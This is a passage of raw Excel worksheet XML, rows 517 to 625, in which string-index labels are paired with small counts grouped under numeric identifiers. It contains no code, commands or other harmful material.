    </row>
    <row r="517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A517" t="s">
        <v>16228</v>
      </c>
      <c r="B517" t="s">
        <v>16213</v>
      </c>
      <c r="C517">
        <v>4</v>
      </c>
      <c r="D517">
        <v>1503</v>
      </c>
    </row>
    <row r="518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A518" t="s">
        <v>16231</v>
      </c>
      <c r="B518" t="s">
        <v>16214</v>
      </c>
      <c r="C518">
        <v>0</v>
      </c>
      <c r="D518">
        <v>1503</v>
      </c>
    </row>
    <row r="519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A519" t="s">
        <v>16228</v>
      </c>
      <c r="B519" t="s">
        <v>16215</v>
      </c>
      <c r="C519">
        <v>0</v>
      </c>
      <c r="D519">
        <v>1503</v>
      </c>
    </row>
    <row r="520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A520" t="s">
        <v>16231</v>
      </c>
      <c r="B520" t="s">
        <v>16216</v>
      </c>
      <c r="C520">
        <v>2</v>
      </c>
      <c r="D520">
        <v>1503</v>
      </c>
    </row>
    <row r="521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A521" t="s">
        <v>16228</v>
      </c>
      <c r="B521" t="s">
        <v>16217</v>
      </c>
      <c r="C521">
        <v>4</v>
      </c>
      <c r="D521">
        <v>1503</v>
      </c>
    </row>
    <row r="522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A522" t="s">
        <v>16231</v>
      </c>
      <c r="B522" t="s">
        <v>16218</v>
      </c>
      <c r="C522">
        <v>0</v>
      </c>
      <c r="D522">
        <v>1503</v>
      </c>
    </row>
    <row r="523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A523" t="s">
        <v>16229</v>
      </c>
      <c r="B523" t="s">
        <v>16219</v>
      </c>
      <c r="C523">
        <v>0</v>
      </c>
      <c r="D523">
        <v>1503</v>
      </c>
    </row>
    <row r="524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A524" t="s">
        <v>16230</v>
      </c>
      <c r="B524" t="s">
        <v>16220</v>
      </c>
      <c r="C524">
        <v>0</v>
      </c>
      <c r="D524">
        <v>1503</v>
      </c>
    </row>
    <row r="525" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A525" t="s">
        <v>16229</v>
      </c>
      <c r="B525" t="s">
        <v>16221</v>
      </c>
      <c r="C525">
        <v>5</v>
      </c>
      <c r="D525">
        <v>1503</v>
      </c>
    </row>
    <row r="526" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A526" t="s">
        <v>16230</v>
      </c>
      <c r="B526" t="s">
        <v>16222</v>
      </c>
      <c r="C526">
        <v>5</v>
      </c>
      <c r="D526">
        <v>1503</v>
      </c>
    </row>
    <row r="527" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A527" t="s">
        <v>16223</v>
      </c>
      <c r="B527" t="s">
        <v>16223</v>
      </c>
      <c r="C527">
        <v>25</v>
      </c>
      <c r="D527">
        <v>1503</v>
      </c>
    </row>
    <row r="528" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A528" t="s">
        <v>16224</v>
      </c>
      <c r="B528" t="s">
        <v>16224</v>
      </c>
      <c r="C528">
        <v>1</v>
      </c>
      <c r="D528">
        <v>1503</v>
      </c>
    </row>
    <row r="529" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A529" t="s">
        <v>16228</v>
      </c>
      <c r="B529" t="s">
        <v>16211</v>
      </c>
      <c r="C529">
        <v>1</v>
      </c>
      <c r="D529">
        <v>1257</v>
      </c>
    </row>
    <row r="530" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A530" t="s">
        <v>16231</v>
      </c>
      <c r="B530" t="s">
        <v>16212</v>
      </c>
      <c r="C530">
        <v>0</v>
      </c>
      <c r="D530">
        <v>1257</v>
      </c>
    </row>
    <row r="531" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A531" t="s">
        <v>16228</v>
      </c>
      <c r="B531" t="s">
        <v>16213</v>
      </c>
      <c r="C531">
        <v>0</v>
      </c>
      <c r="D531">
        <v>1257</v>
      </c>
    </row>
    <row r="532" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A532" t="s">
        <v>16231</v>
      </c>
      <c r="B532" t="s">
        <v>16214</v>
      </c>
      <c r="C532">
        <v>0</v>
      </c>
      <c r="D532">
        <v>1257</v>
      </c>
    </row>
    <row r="533" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A533" t="s">
        <v>16228</v>
      </c>
      <c r="B533" t="s">
        <v>16215</v>
      </c>
      <c r="C533">
        <v>1</v>
      </c>
      <c r="D533">
        <v>1257</v>
      </c>
    </row>
    <row r="534" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A534" t="s">
        <v>16231</v>
      </c>
      <c r="B534" t="s">
        <v>16216</v>
      </c>
      <c r="C534">
        <v>3</v>
      </c>
      <c r="D534">
        <v>1257</v>
      </c>
    </row>
    <row r="535" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A535" t="s">
        <v>16228</v>
      </c>
      <c r="B535" t="s">
        <v>16217</v>
      </c>
      <c r="C535">
        <v>4</v>
      </c>
      <c r="D535">
        <v>1257</v>
      </c>
    </row>
    <row r="536" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A536" t="s">
        <v>16231</v>
      </c>
      <c r="B536" t="s">
        <v>16218</v>
      </c>
      <c r="C536">
        <v>1</v>
      </c>
      <c r="D536">
        <v>1257</v>
      </c>
    </row>
    <row r="537" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A537" t="s">
        <v>16229</v>
      </c>
      <c r="B537" t="s">
        <v>16219</v>
      </c>
      <c r="C537">
        <v>0</v>
      </c>
      <c r="D537">
        <v>1257</v>
      </c>
    </row>
    <row r="538" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A538" t="s">
        <v>16230</v>
      </c>
      <c r="B538" t="s">
        <v>16220</v>
      </c>
      <c r="C538">
        <v>3</v>
      </c>
      <c r="D538">
        <v>1257</v>
      </c>
    </row>
    <row r="539" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A539" t="s">
        <v>16229</v>
      </c>
      <c r="B539" t="s">
        <v>16221</v>
      </c>
      <c r="C539">
        <v>3</v>
      </c>
      <c r="D539">
        <v>1257</v>
      </c>
    </row>
    <row r="540" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A540" t="s">
        <v>16230</v>
      </c>
      <c r="B540" t="s">
        <v>16222</v>
      </c>
      <c r="C540">
        <v>18</v>
      </c>
      <c r="D540">
        <v>1257</v>
      </c>
    </row>
    <row r="541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A541" t="s">
        <v>16223</v>
      </c>
      <c r="B541" t="s">
        <v>16223</v>
      </c>
      <c r="C541">
        <v>22</v>
      </c>
      <c r="D541">
        <v>1257</v>
      </c>
    </row>
    <row r="542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A542" t="s">
        <v>16224</v>
      </c>
      <c r="B542" t="s">
        <v>16224</v>
      </c>
      <c r="C542">
        <v>1</v>
      </c>
      <c r="D542">
        <v>1257</v>
      </c>
    </row>
    <row r="543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A543" t="s">
        <v>16228</v>
      </c>
      <c r="B543" t="s">
        <v>16211</v>
      </c>
      <c r="C543">
        <v>0</v>
      </c>
      <c r="D543">
        <v>2068</v>
      </c>
    </row>
    <row r="544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A544" t="s">
        <v>16231</v>
      </c>
      <c r="B544" t="s">
        <v>16212</v>
      </c>
      <c r="C544">
        <v>0</v>
      </c>
      <c r="D544">
        <v>2068</v>
      </c>
    </row>
    <row r="545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A545" t="s">
        <v>16228</v>
      </c>
      <c r="B545" t="s">
        <v>16213</v>
      </c>
      <c r="C545">
        <v>0</v>
      </c>
      <c r="D545">
        <v>2068</v>
      </c>
    </row>
    <row r="546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A546" t="s">
        <v>16231</v>
      </c>
      <c r="B546" t="s">
        <v>16214</v>
      </c>
      <c r="C546">
        <v>0</v>
      </c>
      <c r="D546">
        <v>2068</v>
      </c>
    </row>
    <row r="547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A547" t="s">
        <v>16228</v>
      </c>
      <c r="B547" t="s">
        <v>16215</v>
      </c>
      <c r="C547">
        <v>1</v>
      </c>
      <c r="D547">
        <v>2068</v>
      </c>
    </row>
    <row r="548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A548" t="s">
        <v>16231</v>
      </c>
      <c r="B548" t="s">
        <v>16216</v>
      </c>
      <c r="C548">
        <v>1</v>
      </c>
      <c r="D548">
        <v>2068</v>
      </c>
    </row>
    <row r="549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A549" t="s">
        <v>16228</v>
      </c>
      <c r="B549" t="s">
        <v>16217</v>
      </c>
      <c r="C549">
        <v>3</v>
      </c>
      <c r="D549">
        <v>2068</v>
      </c>
    </row>
    <row r="550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A550" t="s">
        <v>16231</v>
      </c>
      <c r="B550" t="s">
        <v>16218</v>
      </c>
      <c r="C550">
        <v>1</v>
      </c>
      <c r="D550">
        <v>2068</v>
      </c>
    </row>
    <row r="551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A551" t="s">
        <v>16229</v>
      </c>
      <c r="B551" t="s">
        <v>16219</v>
      </c>
      <c r="C551">
        <v>0</v>
      </c>
      <c r="D551">
        <v>2068</v>
      </c>
    </row>
    <row r="552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A552" t="s">
        <v>16230</v>
      </c>
      <c r="B552" t="s">
        <v>16220</v>
      </c>
      <c r="C552">
        <v>0</v>
      </c>
      <c r="D552">
        <v>2068</v>
      </c>
    </row>
    <row r="553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A553" t="s">
        <v>16229</v>
      </c>
      <c r="B553" t="s">
        <v>16221</v>
      </c>
      <c r="C553">
        <v>10</v>
      </c>
      <c r="D553">
        <v>2068</v>
      </c>
    </row>
    <row r="554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A554" t="s">
        <v>16230</v>
      </c>
      <c r="B554" t="s">
        <v>16222</v>
      </c>
      <c r="C554">
        <v>5</v>
      </c>
      <c r="D554">
        <v>2068</v>
      </c>
    </row>
    <row r="555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A555" t="s">
        <v>16223</v>
      </c>
      <c r="B555" t="s">
        <v>16223</v>
      </c>
      <c r="C555">
        <v>26</v>
      </c>
      <c r="D555">
        <v>2068</v>
      </c>
    </row>
    <row r="556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A556" t="s">
        <v>16224</v>
      </c>
      <c r="B556" t="s">
        <v>16224</v>
      </c>
      <c r="C556">
        <v>0</v>
      </c>
      <c r="D556">
        <v>2068</v>
      </c>
    </row>
    <row r="557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A557" t="s">
        <v>16228</v>
      </c>
      <c r="B557" t="s">
        <v>16211</v>
      </c>
      <c r="C557">
        <v>0</v>
      </c>
      <c r="D557">
        <v>2359</v>
      </c>
    </row>
    <row r="558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A558" t="s">
        <v>16231</v>
      </c>
      <c r="B558" t="s">
        <v>16212</v>
      </c>
      <c r="C558">
        <v>0</v>
      </c>
      <c r="D558">
        <v>2359</v>
      </c>
    </row>
    <row r="559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A559" t="s">
        <v>16228</v>
      </c>
      <c r="B559" t="s">
        <v>16213</v>
      </c>
      <c r="C559">
        <v>0</v>
      </c>
      <c r="D559">
        <v>2359</v>
      </c>
    </row>
    <row r="560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A560" t="s">
        <v>16231</v>
      </c>
      <c r="B560" t="s">
        <v>16214</v>
      </c>
      <c r="C560">
        <v>0</v>
      </c>
      <c r="D560">
        <v>2359</v>
      </c>
    </row>
    <row r="561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A561" t="s">
        <v>16228</v>
      </c>
      <c r="B561" t="s">
        <v>16215</v>
      </c>
      <c r="C561">
        <v>0</v>
      </c>
      <c r="D561">
        <v>2359</v>
      </c>
    </row>
    <row r="562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A562" t="s">
        <v>16231</v>
      </c>
      <c r="B562" t="s">
        <v>16216</v>
      </c>
      <c r="C562">
        <v>0</v>
      </c>
      <c r="D562">
        <v>2359</v>
      </c>
    </row>
    <row r="563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A563" t="s">
        <v>16228</v>
      </c>
      <c r="B563" t="s">
        <v>16217</v>
      </c>
      <c r="C563">
        <v>2</v>
      </c>
      <c r="D563">
        <v>2359</v>
      </c>
    </row>
    <row r="564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A564" t="s">
        <v>16231</v>
      </c>
      <c r="B564" t="s">
        <v>16218</v>
      </c>
      <c r="C564">
        <v>0</v>
      </c>
      <c r="D564">
        <v>2359</v>
      </c>
    </row>
    <row r="565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A565" t="s">
        <v>16229</v>
      </c>
      <c r="B565" t="s">
        <v>16219</v>
      </c>
      <c r="C565">
        <v>0</v>
      </c>
      <c r="D565">
        <v>2359</v>
      </c>
    </row>
    <row r="566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A566" t="s">
        <v>16230</v>
      </c>
      <c r="B566" t="s">
        <v>16220</v>
      </c>
      <c r="C566">
        <v>2</v>
      </c>
      <c r="D566">
        <v>2359</v>
      </c>
    </row>
    <row r="567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A567" t="s">
        <v>16229</v>
      </c>
      <c r="B567" t="s">
        <v>16221</v>
      </c>
      <c r="C567">
        <v>5</v>
      </c>
      <c r="D567">
        <v>2359</v>
      </c>
    </row>
    <row r="568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A568" t="s">
        <v>16230</v>
      </c>
      <c r="B568" t="s">
        <v>16222</v>
      </c>
      <c r="C568">
        <v>40</v>
      </c>
      <c r="D568">
        <v>2359</v>
      </c>
    </row>
    <row r="569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A569" t="s">
        <v>16223</v>
      </c>
      <c r="B569" t="s">
        <v>16223</v>
      </c>
      <c r="C569">
        <v>0</v>
      </c>
      <c r="D569">
        <v>2359</v>
      </c>
    </row>
    <row r="570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A570" t="s">
        <v>16224</v>
      </c>
      <c r="B570" t="s">
        <v>16224</v>
      </c>
      <c r="C570">
        <v>0</v>
      </c>
      <c r="D570">
        <v>2359</v>
      </c>
    </row>
    <row r="571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A571" t="s">
        <v>16228</v>
      </c>
      <c r="B571" t="s">
        <v>16211</v>
      </c>
      <c r="C571">
        <v>0</v>
      </c>
      <c r="D571">
        <v>2318</v>
      </c>
    </row>
    <row r="572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A572" t="s">
        <v>16231</v>
      </c>
      <c r="B572" t="s">
        <v>16212</v>
      </c>
      <c r="C572">
        <v>0</v>
      </c>
      <c r="D572">
        <v>2318</v>
      </c>
    </row>
    <row r="573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A573" t="s">
        <v>16228</v>
      </c>
      <c r="B573" t="s">
        <v>16213</v>
      </c>
      <c r="C573">
        <v>0</v>
      </c>
      <c r="D573">
        <v>2318</v>
      </c>
    </row>
    <row r="574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A574" t="s">
        <v>16231</v>
      </c>
      <c r="B574" t="s">
        <v>16214</v>
      </c>
      <c r="C574">
        <v>0</v>
      </c>
      <c r="D574">
        <v>2318</v>
      </c>
    </row>
    <row r="575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A575" t="s">
        <v>16228</v>
      </c>
      <c r="B575" t="s">
        <v>16215</v>
      </c>
      <c r="C575">
        <v>1</v>
      </c>
      <c r="D575">
        <v>2318</v>
      </c>
    </row>
    <row r="576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A576" t="s">
        <v>16231</v>
      </c>
      <c r="B576" t="s">
        <v>16216</v>
      </c>
      <c r="C576">
        <v>0</v>
      </c>
      <c r="D576">
        <v>2318</v>
      </c>
    </row>
    <row r="577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A577" t="s">
        <v>16228</v>
      </c>
      <c r="B577" t="s">
        <v>16217</v>
      </c>
      <c r="C577">
        <v>0</v>
      </c>
      <c r="D577">
        <v>2318</v>
      </c>
    </row>
    <row r="578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A578" t="s">
        <v>16231</v>
      </c>
      <c r="B578" t="s">
        <v>16218</v>
      </c>
      <c r="C578">
        <v>1</v>
      </c>
      <c r="D578">
        <v>2318</v>
      </c>
    </row>
    <row r="579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A579" t="s">
        <v>16229</v>
      </c>
      <c r="B579" t="s">
        <v>16219</v>
      </c>
      <c r="C579">
        <v>1</v>
      </c>
      <c r="D579">
        <v>2318</v>
      </c>
    </row>
    <row r="580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A580" t="s">
        <v>16230</v>
      </c>
      <c r="B580" t="s">
        <v>16220</v>
      </c>
      <c r="C580">
        <v>0</v>
      </c>
      <c r="D580">
        <v>2318</v>
      </c>
    </row>
    <row r="581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A581" t="s">
        <v>16229</v>
      </c>
      <c r="B581" t="s">
        <v>16221</v>
      </c>
      <c r="C581">
        <v>4</v>
      </c>
      <c r="D581">
        <v>2318</v>
      </c>
    </row>
    <row r="582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A582" t="s">
        <v>16230</v>
      </c>
      <c r="B582" t="s">
        <v>16222</v>
      </c>
      <c r="C582">
        <v>2</v>
      </c>
      <c r="D582">
        <v>2318</v>
      </c>
    </row>
    <row r="583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A583" t="s">
        <v>16223</v>
      </c>
      <c r="B583" t="s">
        <v>16223</v>
      </c>
      <c r="C583">
        <v>6</v>
      </c>
      <c r="D583">
        <v>2318</v>
      </c>
    </row>
    <row r="584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A584" t="s">
        <v>16224</v>
      </c>
      <c r="B584" t="s">
        <v>16224</v>
      </c>
      <c r="C584">
        <v>1</v>
      </c>
      <c r="D584">
        <v>2318</v>
      </c>
    </row>
    <row r="585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A585" t="s">
        <v>16228</v>
      </c>
      <c r="B585" t="s">
        <v>16211</v>
      </c>
      <c r="C585">
        <v>0</v>
      </c>
      <c r="D585">
        <v>853</v>
      </c>
    </row>
    <row r="586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A586" t="s">
        <v>16231</v>
      </c>
      <c r="B586" t="s">
        <v>16212</v>
      </c>
      <c r="C586">
        <v>0</v>
      </c>
      <c r="D586">
        <v>853</v>
      </c>
    </row>
    <row r="587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A587" t="s">
        <v>16228</v>
      </c>
      <c r="B587" t="s">
        <v>16213</v>
      </c>
      <c r="C587">
        <v>0</v>
      </c>
      <c r="D587">
        <v>853</v>
      </c>
    </row>
    <row r="588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A588" t="s">
        <v>16231</v>
      </c>
      <c r="B588" t="s">
        <v>16214</v>
      </c>
      <c r="C588">
        <v>0</v>
      </c>
      <c r="D588">
        <v>853</v>
      </c>
    </row>
    <row r="589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A589" t="s">
        <v>16228</v>
      </c>
      <c r="B589" t="s">
        <v>16215</v>
      </c>
      <c r="C589">
        <v>0</v>
      </c>
      <c r="D589">
        <v>853</v>
      </c>
    </row>
    <row r="590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A590" t="s">
        <v>16231</v>
      </c>
      <c r="B590" t="s">
        <v>16216</v>
      </c>
      <c r="C590">
        <v>3</v>
      </c>
      <c r="D590">
        <v>853</v>
      </c>
    </row>
    <row r="591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A591" t="s">
        <v>16228</v>
      </c>
      <c r="B591" t="s">
        <v>16217</v>
      </c>
      <c r="C591">
        <v>11</v>
      </c>
      <c r="D591">
        <v>853</v>
      </c>
    </row>
    <row r="592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A592" t="s">
        <v>16231</v>
      </c>
      <c r="B592" t="s">
        <v>16218</v>
      </c>
      <c r="C592">
        <v>4</v>
      </c>
      <c r="D592">
        <v>853</v>
      </c>
    </row>
    <row r="593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A593" t="s">
        <v>16229</v>
      </c>
      <c r="B593" t="s">
        <v>16219</v>
      </c>
      <c r="C593">
        <v>0</v>
      </c>
      <c r="D593">
        <v>853</v>
      </c>
    </row>
    <row r="594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A594" t="s">
        <v>16230</v>
      </c>
      <c r="B594" t="s">
        <v>16220</v>
      </c>
      <c r="C594">
        <v>0</v>
      </c>
      <c r="D594">
        <v>853</v>
      </c>
    </row>
    <row r="595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A595" t="s">
        <v>16229</v>
      </c>
      <c r="B595" t="s">
        <v>16221</v>
      </c>
      <c r="C595">
        <v>6</v>
      </c>
      <c r="D595">
        <v>853</v>
      </c>
    </row>
    <row r="596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A596" t="s">
        <v>16230</v>
      </c>
      <c r="B596" t="s">
        <v>16222</v>
      </c>
      <c r="C596">
        <v>4</v>
      </c>
      <c r="D596">
        <v>853</v>
      </c>
    </row>
    <row r="597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A597" t="s">
        <v>16223</v>
      </c>
      <c r="B597" t="s">
        <v>16223</v>
      </c>
      <c r="C597">
        <v>30</v>
      </c>
      <c r="D597">
        <v>853</v>
      </c>
    </row>
    <row r="598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A598" t="s">
        <v>16224</v>
      </c>
      <c r="B598" t="s">
        <v>16224</v>
      </c>
      <c r="C598">
        <v>1</v>
      </c>
      <c r="D598">
        <v>853</v>
      </c>
    </row>
    <row r="599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A599" t="s">
        <v>16228</v>
      </c>
      <c r="B599" t="s">
        <v>16211</v>
      </c>
      <c r="C599">
        <v>1</v>
      </c>
      <c r="D599">
        <v>1358</v>
      </c>
    </row>
    <row r="600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A600" t="s">
        <v>16231</v>
      </c>
      <c r="B600" t="s">
        <v>16212</v>
      </c>
      <c r="C600">
        <v>1</v>
      </c>
      <c r="D600">
        <v>1358</v>
      </c>
    </row>
    <row r="601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A601" t="s">
        <v>16228</v>
      </c>
      <c r="B601" t="s">
        <v>16213</v>
      </c>
      <c r="C601">
        <v>1</v>
      </c>
      <c r="D601">
        <v>1358</v>
      </c>
    </row>
    <row r="602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A602" t="s">
        <v>16231</v>
      </c>
      <c r="B602" t="s">
        <v>16214</v>
      </c>
      <c r="C602">
        <v>1</v>
      </c>
      <c r="D602">
        <v>1358</v>
      </c>
    </row>
    <row r="603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A603" t="s">
        <v>16228</v>
      </c>
      <c r="B603" t="s">
        <v>16215</v>
      </c>
      <c r="C603">
        <v>2</v>
      </c>
      <c r="D603">
        <v>1358</v>
      </c>
    </row>
    <row r="604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A604" t="s">
        <v>16231</v>
      </c>
      <c r="B604" t="s">
        <v>16216</v>
      </c>
      <c r="C604">
        <v>5</v>
      </c>
      <c r="D604">
        <v>1358</v>
      </c>
    </row>
    <row r="605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A605" t="s">
        <v>16228</v>
      </c>
      <c r="B605" t="s">
        <v>16217</v>
      </c>
      <c r="C605">
        <v>0</v>
      </c>
      <c r="D605">
        <v>1358</v>
      </c>
    </row>
    <row r="606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A606" t="s">
        <v>16231</v>
      </c>
      <c r="B606" t="s">
        <v>16218</v>
      </c>
      <c r="C606">
        <v>0</v>
      </c>
      <c r="D606">
        <v>1358</v>
      </c>
    </row>
    <row r="607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A607" t="s">
        <v>16229</v>
      </c>
      <c r="B607" t="s">
        <v>16219</v>
      </c>
      <c r="C607">
        <v>0</v>
      </c>
      <c r="D607">
        <v>1358</v>
      </c>
    </row>
    <row r="608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A608" t="s">
        <v>16230</v>
      </c>
      <c r="B608" t="s">
        <v>16220</v>
      </c>
      <c r="C608">
        <v>0</v>
      </c>
      <c r="D608">
        <v>1358</v>
      </c>
    </row>
    <row r="609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A609" t="s">
        <v>16229</v>
      </c>
      <c r="B609" t="s">
        <v>16221</v>
      </c>
      <c r="C609">
        <v>25</v>
      </c>
      <c r="D609">
        <v>1358</v>
      </c>
    </row>
    <row r="610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A610" t="s">
        <v>16230</v>
      </c>
      <c r="B610" t="s">
        <v>16222</v>
      </c>
      <c r="C610">
        <v>2</v>
      </c>
      <c r="D610">
        <v>1358</v>
      </c>
    </row>
    <row r="611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A611" t="s">
        <v>16223</v>
      </c>
      <c r="B611" t="s">
        <v>16223</v>
      </c>
      <c r="C611">
        <v>25</v>
      </c>
      <c r="D611">
        <v>1358</v>
      </c>
    </row>
    <row r="612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A612" t="s">
        <v>16224</v>
      </c>
      <c r="B612" t="s">
        <v>16224</v>
      </c>
      <c r="C612">
        <v>1</v>
      </c>
      <c r="D612">
        <v>1358</v>
      </c>
    </row>
    <row r="613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A613" t="s">
        <v>16229</v>
      </c>
      <c r="B613" t="s">
        <v>16221</v>
      </c>
      <c r="C613">
        <v>21</v>
      </c>
      <c r="D613">
        <v>1358</v>
      </c>
    </row>
    <row r="614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A614" t="s">
        <v>16228</v>
      </c>
      <c r="B614" t="s">
        <v>16211</v>
      </c>
      <c r="C614">
        <v>0</v>
      </c>
      <c r="D614">
        <v>433</v>
      </c>
    </row>
    <row r="615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A615" t="s">
        <v>16231</v>
      </c>
      <c r="B615" t="s">
        <v>16212</v>
      </c>
      <c r="C615">
        <v>0</v>
      </c>
      <c r="D615">
        <v>433</v>
      </c>
    </row>
    <row r="616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A616" t="s">
        <v>16228</v>
      </c>
      <c r="B616" t="s">
        <v>16213</v>
      </c>
      <c r="C616">
        <v>1</v>
      </c>
      <c r="D616">
        <v>433</v>
      </c>
    </row>
    <row r="617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A617" t="s">
        <v>16231</v>
      </c>
      <c r="B617" t="s">
        <v>16214</v>
      </c>
      <c r="C617">
        <v>1</v>
      </c>
      <c r="D617">
        <v>433</v>
      </c>
    </row>
    <row r="618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A618" t="s">
        <v>16228</v>
      </c>
      <c r="B618" t="s">
        <v>16215</v>
      </c>
      <c r="C618">
        <v>1</v>
      </c>
      <c r="D618">
        <v>433</v>
      </c>
    </row>
    <row r="619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A619" t="s">
        <v>16231</v>
      </c>
      <c r="B619" t="s">
        <v>16216</v>
      </c>
      <c r="C619">
        <v>1</v>
      </c>
      <c r="D619">
        <v>433</v>
      </c>
    </row>
    <row r="620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A620" t="s">
        <v>16228</v>
      </c>
      <c r="B620" t="s">
        <v>16217</v>
      </c>
      <c r="C620">
        <v>1</v>
      </c>
      <c r="D620">
        <v>433</v>
      </c>
    </row>
    <row r="621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A621" t="s">
        <v>16231</v>
      </c>
      <c r="B621" t="s">
        <v>16218</v>
      </c>
      <c r="C621">
        <v>1</v>
      </c>
      <c r="D621">
        <v>433</v>
      </c>
    </row>
    <row r="622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A622" t="s">
        <v>16229</v>
      </c>
      <c r="B622" t="s">
        <v>16219</v>
      </c>
      <c r="C622">
        <v>0</v>
      </c>
      <c r="D622">
        <v>433</v>
      </c>
    </row>
    <row r="623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A623" t="s">
        <v>16230</v>
      </c>
      <c r="B623" t="s">
        <v>16220</v>
      </c>
      <c r="C623">
        <v>0</v>
      </c>
      <c r="D623">
        <v>433</v>
      </c>
    </row>
    <row r="624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A624" t="s">
        <v>16229</v>
      </c>
      <c r="B624" t="s">
        <v>16221</v>
      </c>
      <c r="C624">
        <v>5</v>
      </c>
      <c r="D624">
        <v>433</v>
      </c>
    </row>
    <row r="625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A625" t="s">
        <v>16230</v>
      </c>
      <c r="B625" t="s">
        <v>16222</v>
      </c>
      <c r="C625">
        <v>4</v>
      </c>
